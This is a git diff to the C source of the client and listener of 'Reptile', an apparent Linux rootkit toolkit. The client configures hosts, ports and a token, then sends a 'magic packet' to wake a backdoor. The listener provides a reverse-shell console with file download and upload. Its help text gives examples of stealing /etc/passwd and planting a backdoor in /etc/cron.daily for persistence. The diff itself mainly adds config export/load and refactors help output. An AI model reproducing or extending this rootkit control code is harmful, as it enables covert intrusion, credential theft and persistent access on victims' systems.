diff --git a/sbin/client.c b/sbin/client.c index f9f9935..570458a 100644 --- a/sbin/client.c +++ b/sbin/client.c @@ -18,14 +18,17 @@ #include #include #include +#include #include "config.h" #include "util.h" pid_t pid; +char *listener, *packet; char *var_str[] = {"lhost", "lport", "srchost", "srcport", "rhost", "rport", "prot", "pass", "token"}; + char *var_str_up[] = {"LHOST", "LPORT", "SRCHOST", "SRCPORT", "RHOST", "RPORT", "PROT", "PASS", "TOKEN"}; @@ -48,11 +51,14 @@ int set(char **args); int unset(char **args); int show(char **args); int run(char **args); +int export(char **args); +int load(char **args); -char *builtin_str[] = {"help", "set", "unset", "show", "run", "exit"}; -int (*builtin_func[])(char **) = {&help, &set, &unset, &show, &run, &__exit}; +char *builtin_str[] = {"help", "set", "unset", "show", "run", "export", "load", "exit"}; +int (*builtin_func[])(char **) = {&help, &set, &unset, &show, &run, &export, &load, &__exit}; -int num_builtins() { return sizeof(builtin_str) / sizeof(char *); } +int num_builtins() +{ return sizeof(builtin_str) / sizeof(char *); } int launch(char **args) { @@ -76,47 +82,66 @@ int launch(char **args) return 1; } +void help_set() +{ + fprintf(stdout, "%s \n", builtin_str[1]); + fprintf(stdout, "Example: set LHOST 192.168.0.2\n"); +} + +void help_unset() +{ + fprintf(stdout, "%s \n", builtin_str[2]); + fprintf(stdout, "Example: unset RHOST\n"); +} + +void help_conf(int i) +{ + fprintf(stdout, "%s \n", builtin_str[i]); + fprintf(stdout, "Example: %s client.conf\n", builtin_str[i]); +} + +void no_help() +{ + fprintf(stdout, "This command doesn't need help\n"); +} + int help(char **args) { if (args[0] == NULL) return 1; if (args[1] != NULL) { - if (strcmp(args[1], builtin_str[1]) == 0) { - fprintf(stdout, "%s \n", - builtin_str[1]); - fprintf(stdout, "Example: set LHOST 192.168.0.2\n"); + if (strcmp(args[1], builtin_str[0]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[1]) == 0) { + help_set(); } else if (strcmp(args[1], builtin_str[2]) == 0) { - fprintf(stdout, "%s \n", builtin_str[2]); - fprintf(stdout, "Example: unset RHOST\n"); + help_unset(); + } else if (strcmp(args[1], builtin_str[3]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[4]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[5]) == 0) { + help_conf(5); + } else if (strcmp(args[1], builtin_str[6]) == 0) { + help_conf(6); + } else if (strcmp(args[1], builtin_str[7]) == 0) { + no_help(); } else { - if (strcmp(args[1], builtin_str[0]) == 0 || - strcmp(args[1], builtin_str[3]) == 0 || - strcmp(args[1], builtin_str[4]) == 0 || - strcmp(args[1], builtin_str[5]) == 0) { - fprintf(stdout, - "This command doesn't need help\n"); - } else { - fprintf(stdout, "This command is not valid!\n"); - } + fprintf(stdout, "This command is not valid!\n"); } } else { fprintf(stdout, "\n\e[01;36mReptile Client\e[00m\n"); - fprintf(stdout, "\e[01;32mWritten by: F0rb1dd3n\e[00m\n\n"); fprintf(stdout, "\t%s\t\tShow this help\n", builtin_str[0]); - fprintf(stdout, "\t%s\t\tSet value to a variable\n", - builtin_str[1]); - fprintf(stdout, "\t%s\t\tUnset value to a variable\n", - builtin_str[2]); - fprintf(stdout, "\t%s\t\tShow the current configuration\n", - builtin_str[3]); - fprintf(stdout, - "\t%s\t\tRun the listener and send the magic packet\n", - builtin_str[4]); - fprintf(stdout, "\t%s\t\tExit this shell\n\n", builtin_str[5]); - fprintf(stdout, - "Type: \"help \" to see specific help\n"); + fprintf(stdout, "\t%s\t\tSet value to a variable\n", builtin_str[1]); + fprintf(stdout, "\t%s\t\tUnset value to a variable\n", builtin_str[2]); + fprintf(stdout, "\t%s\t\tShow the current configuration\n", builtin_str[3]); + fprintf(stdout, "\t%s\t\tRun the listener and send the magic packet\n", builtin_str[4]); + fprintf(stdout, "\t%s\t\tExport a configuration to a file\n", builtin_str[5]); + fprintf(stdout, "\t%s\t\tLoad a configuration from a file\n", builtin_str[6]); + fprintf(stdout, "\t%s\t\tExit this shell\n\n", builtin_str[7]); + fprintf(stdout, "Type: \"help \" to see specific help\n"); } fprintf(stdout, "\n"); @@ -137,6 +162,12 @@ int __exit(char **args) var_array[i] = NULL; } + if (listener) + free(listener); + + if (packet) + free(packet); + fprintf(stdout, "\n"); return 0; } @@ -232,13 +263,18 @@ int show(char **args) return 1; } +void interrupt(int signal) +{ + fprintf(stdout, "\r"); + fflush(stdout); + fprintf(stdout, "%s Interrupted: %d\n", warn, signal); +} + int run(char **args) { pid_t pid, pid2; - int status, len; - char *listener, *packet; - char *envp[1] = {NULL}; - char *pwd = get_current_dir_name(); + int status; + //char *envp[1] = {NULL}; if (args[0] == NULL) return 1; @@ -288,29 +324,6 @@ int run(char **args) } } - len = strlen(pwd); - - listener = (char *)malloc(len + 9); - - if (!listener) - fatal("malloc"); - - packet = (char *)malloc(len + 7); - - if (!packet) { - free(listener); - fatal("malloc"); - } - - bzero(listener, len + 9); - bzero(packet, len + 7); - - strcpy(listener, pwd); - strcat(listener, "/listener"); - - strcpy(packet, pwd); - strcat(packet, "/packet"); - char *arg_listener[] = {listener, "-p", var_array[1], "-s", var_array[7], NULL, NULL}; @@ -326,12 +339,12 @@ int run(char **args) fatal("on forking proccess"); if (pid > 0) { + signal(SIGTERM, interrupt); + signal(SIGINT, interrupt); + do { waitpid(pid, &status, WUNTRACED); } while (!WIFEXITED(status) && !WIFSIGNALED(status)); - - free(listener); - free(packet); } if (pid == 0) { @@ -345,8 +358,8 @@ int run(char **args) arg_listener[3] = NULL; arg_listener[4] = NULL; } - execve(arg_listener[0], arg_listener, envp); - exit(1); + if (execvp(arg_listener[0], arg_listener) == -1) + fprintf(stderr, "%s listener could not be launched\n", bad); } if (pid2 == 0) { @@ -358,10 +371,80 @@ int run(char **args) arg_packet[16] = NULL; } usleep(100 * 1500); - execve(arg_packet[0], arg_packet, envp); - exit(1); + + if (execvp(arg_packet[0], arg_packet) == -1) { + fprintf(stderr, "%s packet could not be launched\n", bad); + kill(pid2, SIGINT); + } + } + } + + return 1; +} + +/* + * Thanks aliyuchang33 for suggesting this! ;) + * + * https://github.com/f0rb1dd3n/Reptile/pull/61/commits/0482eeff93c5b3f9097f7e06e2b2a0fcf248eb8e + * + */ + +int export(char **args) +{ + int vars; + FILE *confile; + + if (args[0] == NULL) + return 1; + + if (args[1] == NULL) { + fprintf(stdout, "%s wrong syntax!\n", bad); + return 1; + } + + if (!(confile = fopen(args[1], "w+"))) { + fprintf(stderr, "%s Cannot open config file\n", bad); + return 1; + } + + for (vars = 0; vars < 9; vars++) + fprintf(confile, "%s\n", var_array[vars]); + + fclose(confile); + fprintf(stdout, "%s Configuration exported\n", good); + return 1; +} + +int load(char **args) +{ + int vars; + FILE *confile; + + if (args[0] == NULL) + return 1; + + if (args[1] == NULL) { + fprintf(stdout, "%s wrong syntax!\n", bad); + return 1; + } + + if (!(confile = fopen(args[1], "r+"))) { + fprintf(stderr, "%s Cannot open config file\n", bad); + return 1; + } + + for (vars = 0; vars < 9; vars++) { + char arg[50] = {0}; + fgets(arg, 50, confile); + + if (strcmp(arg, "(null)\n")) { + arg[strlen(arg) - 1] = '\0'; + var_array[vars] = strdup(arg); } } + + fclose(confile); + fprintf(stdout, "%s Configuration loaded\n", good); return 1; } @@ -469,9 +552,8 @@ void client_loop() int main() { - char lport[] = "4444"; - char srcport[] = "666"; - char token[] = "hax0r"; + int len; + char *pwd = get_current_dir_name(); system("clear"); printf("\n\e[01;36mReptile Client\e[00m\n"); @@ -479,9 +561,28 @@ int main() banner2(); printf("\n"); - var_array[1] = strdup(lport); - var_array[3] = strdup(srcport); - var_array[8] = strdup(token); + len = strlen(pwd); + + listener = (char *)malloc(len + 10); + + if (!listener) + fatal("malloc"); + + packet = (char *)malloc(len + 8); + + if (!packet) { + free(listener); + fatal("malloc"); + } + + bzero(listener, len + 10); + bzero(packet, len + 8); + + strcpy(listener, pwd); + strcat(listener, "/listener"); + + strcpy(packet, pwd); + strcat(packet, "/packet"); pid = fork(); diff --git a/sbin/listener.c b/sbin/listener.c index 8518160..9bcc5e3 100644 --- a/sbin/listener.c +++ b/sbin/listener.c @@ -73,55 +73,62 @@ void pel_error(char *s) } } +void help_download() +{ + fprintf(stdout, "%s \n", builtin_str[1]); + fprintf(stdout, "Example: download /etc/passwd /tmp\n"); +} + +void help_upload() +{ + fprintf(stdout, "%s \n", builtin_str[2]); + fprintf(stdout, "Example: upload /root/backdoor /etc/cron.daily\n"); +} + +void help_delay() +{ + fprintf(stdout, "%s \n", builtin_str[4]); + fprintf(stdout, "Example: delay 3600\n\n"); + fprintf(stdout, "%s Use \"delay 0\" if you don't wanna a " + "connecion every X time\n", warn); +} + +void no_help() +{ + fprintf(stdout, "This command doesn't need help\n"); +} + int help(int sock, char **args) { if (args[0] == NULL && sock == -1) return 1; if (args[1] != NULL) { - if (strcmp(args[1], builtin_str[1]) == 0) { - fprintf(stdout, "%s \n", - builtin_str[1]); - fprintf(stdout, "Example: download /etc/passwd /tmp\n"); + if (strcmp(args[1], builtin_str[0]) == 0) { + no_help(); + } else if (strcmp(args[1], builtin_str[1]) == 0) { + help_download(); } else if (strcmp(args[1], builtin_str[2]) == 0) { - fprintf(stdout, "%s \n", - builtin_str[2]); - fprintf( - stdout, - "Example: upload /root/backdoor /etc/cron.daily\n"); + help_upload(); + } else if (strcmp(args[1], builtin_str[3]) == 0) { + no_help(); } else if (strcmp(args[1], builtin_str[4]) == 0) { - fprintf(stdout, "%s \n", builtin_str[4]); - fprintf(stdout, "Example: delay 3600\n\n"); - fprintf(stdout, - "%s Use \"delay 0\" if you don't wanna a " - "connecion every X time\n", - warn); + help_delay(); + } else if (strcmp(args[1], builtin_str[5]) == 0) { + no_help(); } else { - if (strcmp(args[1], builtin_str[0]) == 0 || - strcmp(args[1], builtin_str[3]) == 0 || - strcmp(args[1], builtin_str[5]) == 0) { - fprintf(stdout, - "This command doesn't need help\n"); - } else { - fprintf(stdout, "This command is not valid!\n"); - } + fprintf(stdout, "This command is not valid!\n"); } } else { fprintf(stdout, "\n\e[01;36mReptile Shell\e[00m\n"); - fprintf(stdout, "\e[01;32mWritten by: F0rb1dd3n\e[00m\n\n"); fprintf(stdout, "\t%s\t\tShow this help\n", builtin_str[0]); - fprintf(stdout, "\t%s\tDownload a file from host\n", - builtin_str[1]); - fprintf(stdout, "\t%s\t\tUpload a file to host\n", - builtin_str[2]); - fprintf(stdout, "\t%s\t\tOpen a full TTY interactive shell\n", - builtin_str[3]); - fprintf(stdout, "\t%s\t\tSet time to reverse shell connect\n", - builtin_str[4]); + fprintf(stdout, "\t%s\tDownload a file from host\n", builtin_str[1]); + fprintf(stdout, "\t%s\t\tUpload a file to host\n", builtin_str[2]); + fprintf(stdout, "\t%s\t\tOpen a full TTY interactive shell\n", builtin_str[3]); + fprintf(stdout, "\t%s\t\tSet time to reverse shell connect\n", builtin_str[4]); fprintf(stdout, "\t%s\t\tExit this shell\n\n", builtin_str[5]); - fprintf(stdout, - "Type: \"help \" to see specific help\n"); + fprintf(stdout, "Type: \"help \" to see specific help\n"); } fprintf(stdout, "\n"); @@ -550,7 +557,7 @@ int execute(int sock, char **args) { int i, ret; - if (args[0] == NULL && sock == -1) + if (args[0] == NULL || sock == -1) return 1; for (i = 0; i < num_builtins(); i++) {